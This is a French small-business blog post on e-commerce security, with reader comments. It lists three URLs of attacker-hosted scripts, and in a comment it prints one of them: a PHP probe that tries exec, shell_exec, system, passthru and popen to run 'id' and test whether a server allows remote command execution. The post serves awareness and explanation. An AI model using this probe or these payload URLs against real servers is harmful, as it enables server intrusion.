TOUT ALLANT VERT: Le blog

Blog des fondateurs de l’entreprise verte et citoyenne Tout allant vert

4

E-commerce et sécurité (partie 2)

Suite à une discussion sur le sujet avec Edwood, il nous est apparu important pour la démonstration et afin de vous rendre compte de l’importance de sécuriser ses scripts de vous donner quelques exemples d’URL de scripts « pirates » que l’on essaye de faire tourner chez vous. Que vous ayez une boutique, un simple blog ou autre… Si vous savez lire le code informatique, tant mieux pour vous sinon demandez à votre expert informatique et demandez lui ce que font les scripts suivants… Vous serez certainement très surpris.

http://210.176.70.186/cse.jpg
http://canalpt.net/catalog/images/12.txt
http://vps.istri.info/manual/secure.txt

Attention ,les URLs suivants ne sont pas permanents. Ils proviennent à notre avis de sites intermédiaires utilisés par les pirates.
A l’heure où vous lisez ces articles. Certains URL ne seront probablement plus accessibles.

Articles similaires:

  1. Pillage, propriété intellectuelle et e-commerce
  2. Commerce: Des soldes permanents ou récurrents? Une bonne fausse idée
  3. E-commerce et sécurité: l’importance de se mettre à jour
  4. Colis perdu, colis non livré, en retard? Appelez le 3631 (numéro de téléphone gratuit)
  5. Vie d’entreprise: perturbations du 10/02 liés à la tempête… informatique
E-commerce, Entreprenariat, Général
D&AS Posté il y a 1447 jours

4 Responses so far.

  1. AlekSlam says:
    29 février 2008

    Bonjour
    pour info, moi qui suit barbu, mais pas féru de code, que veut dire le 3ème script : http://vps.istri.info/manual/secure.txt
    copié/collé ci-dessous

    <?php
    echo « Mic22″;
    $cmd= »id »;
    $eseguicmd=ex($cmd);
    echo $eseguicmd;

    function ex($cfe){
    $res =  »;
    if (!empty($cfe)){
    if(function_exists(‘exec’)){
    @exec($cfe,$res);
    $res = join(« \n »,$res);
    }
    elseif(function_exists(‘shell_exec’)){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists(‘system’)){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists(‘passthru’)){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe, »r »))){
    $res = «  »;
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    Merci pour l’éclairage

  2. D&AS says:
    29 février 2008

    cela est un script qui semble til permet de tester s’il est possible d’éxécuter des commandes directes sur le serveur.
    s’il y a un résultat qui apparait, cela signifie que la faille est présente et le serveur exploitable.

  3. AlekSlam says:
    29 février 2008

    Salut
    J’vais dire ok, pour montrer que j’ai compris, alors que non pas trop, mais est-ce type d’url qui déclenche un doute ou est-ce une action qui découle de ce script pirate qui n’est pas traditionnelle ?
    Concrètement qu’elle est la manifestation de ce type d’attaque, si il y en a une.
    A plus

  4. D&AS says:
    1 mars 2008

    Concrètement, c’est comme si un voleur avait crée une entrée secrète pour rentrer chez toi et lui donner la possibilité de faire ce qu’il veut quand il veut. Il peut à l’aise tout casser, tout copier, tout effacer, tout copier chez toi.